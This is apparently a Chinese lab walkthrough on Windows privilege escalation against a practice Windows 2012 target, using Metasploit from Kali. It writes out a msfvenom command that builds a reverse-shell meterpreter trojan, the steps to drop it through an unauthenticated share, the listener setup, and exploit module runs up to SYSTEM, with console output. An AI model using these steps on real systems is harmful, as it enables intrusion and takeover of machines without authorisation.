Windows溢出提权 [msf全自动提权练习]
环境
Windows2012目标机(靶机),kali攻击机,Windows10(作为一个中转的机器,重点是前两个)
Windows2012
(由于该虚拟机无法安装vmtools,无法与真实机交互文件,所以我在本机win10上开启了一个共享文件,使他们可以交互文件方便后续操作。
正常的流程应该是2012上有一个web服务,通过getshell之后传递木马并运行上线msf)
kali生成exe木马
Windows msf.exe反弹木马,反弹地址为kali地址,反弹端口4444
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.54 LPORT=4444 -f exe -o msf.exe |
然后把该木马拖到真实机的共享文件夹里
木马上传
由于真实机与靶机无法交互,所以换一种思路,两台机器在同一网段下,真实机开启文件共享服务,利用文件共享服务把木马传至靶机。
选择一个文件夹,作为共享文件夹
右键属性-》共享-》选择everyone添加
给予完全控制权限
也是为了防止后续出现其他的问题
回到共享栏-》选择网络和共享中心
这里是为了关闭身份验证,不然他会需要账户密码
靶机访问-》拖木马
路径长是因为我木马放在了共享文件夹的下一级目录里(问题不大),然后就可以拖出来了
kali监听
输入 :msfconsole
选择监听模块 :use exploit/multi/handler
设置payload:set payload windows/meterpreter/reverse_tcp
(该payload,应该与生成木马时的payload一样)
查看还需要设置什么:options
设置一个lhost地址:set lhost 192.168.10.54
(监听地址,也是木马生成时的反弹地址(kali本机))
设置端口:与木马反弹的端口一致(这里我默认就是4444,所以不用改)
开启监听:run
靶机运行木马-》msf上线
┌──(root㉿kali)-[/home/kali] └─# msfconsole ______________________________________________________________________________ || |3Kom SuperHack II Logon| |______________________________________________________________________________| || || || |User Name:[security]| || |Password:[]| || || || |[ OK ]| |______________________________________________________________________________| || |https://metasploit.com | |______________________________________________________________________________| =[metasploit v6.3.19-dev] + -- --=[ 2318 exploits - 1215 auxiliary - 412 post] + -- --=[ 1234 payloads - 46 encoders - 11 nops] + -- --=[ 9 evasion] Metasploit tip: Enable verbose logging with set VERBOSE true Metasploit Documentation: https://docs.metasploit.com/ msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/met set payload windows/meterpreter/bind_hidden_ipknock_tcp set payload windows/meterpreter/bind_hidden_tcp set payload windows/meterpreter/bind_ipv6_tcp set payload windows/meterpreter/bind_ipv6_tcp_uuid set payload windows/meterpreter/bind_named_pipe set payload windows/meterpreter/bind_nonx_tcp set payload windows/meterpreter/bind_tcp set payload windows/meterpreter/bind_tcp_rc4 set payload windows/meterpreter/bind_tcp_uuid set payload windows/meterpreter/reverse_hop_http set payload windows/meterpreter/reverse_http set payload windows/meterpreter/reverse_http_proxy_pstore set payload windows/meterpreter/reverse_https set payload windows/meterpreter/reverse_https_proxy set payload windows/meterpreter/reverse_ipv6_tcp set payload windows/meterpreter/reverse_named_pipe set payload windows/meterpreter/reverse_nonx_tcp set payload windows/meterpreter/reverse_ord_tcp set payload windows/meterpreter/reverse_tcp set payload windows/meterpreter/reverse_tcp_allports set payload windows/meterpreter/reverse_tcp_dns set payload windows/meterpreter/reverse_tcp_rc4 set payload windows/meterpreter/reverse_tcp_rc4_dns set payload windows/meterpreter/reverse_tcp_uuid msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > options Module options (exploit/multi/handler): NameCurrentSettingRequiredDescription -------------------------------------- Payload options (windows/meterpreter/reverse_tcp): NameCurrentSettingRequiredDescription -------------------------------------- EXITFUNCprocessyesExittechnique (Accepted :'', seh, thread, proce ss,none) LHOSTyesThelisten address (an i nterfacemay be specifie d) LPORT4444yesThelisten port Exploit target: IdName ------ 0WildcardTarget View the full module info with the info, or info -d command. msf6 exploit(multi/handler) > set lhost 192.168.10.54 lhost => 192.168.10.54 msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.10.54:4444 [*] Sending stage (175686 bytes) to 192.168.10.62 [*] Meterpreter session 1 opened (192.168.10.54:4444 -> 192.168.10.62:49196) at 2023-07-21 09:28:52 +0800 |
这里应该是webshell连上之后传入木马程序,然后命令运行。但是2012靶机上没有web服务所以我这里就直接在靶机上点击运行了(这样的权限是administrator,不用管,我们的目的是为了提升到system权限)
查看权限
保存该会话
bg
提权
切换为提权模块
use post/multi/recon/local_exploit_suggester
查看需要设置什么
options
设置一个session
set session 1
启动
run
命令过程
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester msf6 post(multi/recon/local_exploit_suggester) > options Module options (post/multi/recon/local_exploit_suggester): NameCurrentSettinRequiredDescription g ------------------------------------- SESSIONyesThesession to run t hismodule on SHOWDESCRIPTIfalseyesDisplaysa detailed ONdescriptionfor the availableexploits View the full module info with the info, or info -d command. msf6 post(multi/recon/local_exploit_suggester) > set session 1 session => 1 msf6 post(multi/recon/local_exploit_suggester) > run |
然后他会自动检测有哪些可利用的漏洞,执行结束列出
yes代表可能存在该漏洞可利用,no代表没有
执行提取
选择一个模块:use exploit/windows/local/ms16_075_reflection_juicy
查看需要哪些设置:options
设置session:set session 1
启动:run
命令过程
msf6 exploit(windows/local/bypassuac_eventvwr) > use exploit/windows/local/ms16_075_reflection [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/ms16_075_reflection) > options Module options (exploit/windows/local/ms16_075_reflection): NameCurrentSettingRequiredDescription -------------------------------------- SESSIONyesThesession to run this m oduleon Payload options (windows/meterpreter/reverse_tcp): NameCurrentSettingRequiredDescription -------------------------------------- EXITFUNCnoneyesExittechnique (Accepted :'', seh, thread, proce ss,none) LHOST192.168.10.54yesThelisten address (an i nterfacemay be specifie d) LPORT4444yesThelisten port Exploit target: IdName ------ 0Automatic View the full module info with the info, or info -d command. msf6 exploit(windows/local/ms16_075_reflection) > set session 1 session => 1 msf6 exploit(windows/local/ms16_075_reflection) > run [*] Started reverse TCP handler on 192.168.10.54:4444 [*] x64 [-] Exploit aborted due to failure: bad-config: Session/Target Arch mismatch; WOW64 not supported [*] Exploit completed, but no session was created. msf6 exploit(windows/local/ms16_075_reflection) > use exploit/windows/local/ms16_075_reflection_juicy [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/ms16_075_reflection_juicy) > set session 1 session => 1 msf6 exploit(windows/local/ms16_075_reflection_juicy) > run |
执行提权成功
原文始发于微信公众号(小白摸坑学网安):Windows溢出提权 [msf全自动提权练习]
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论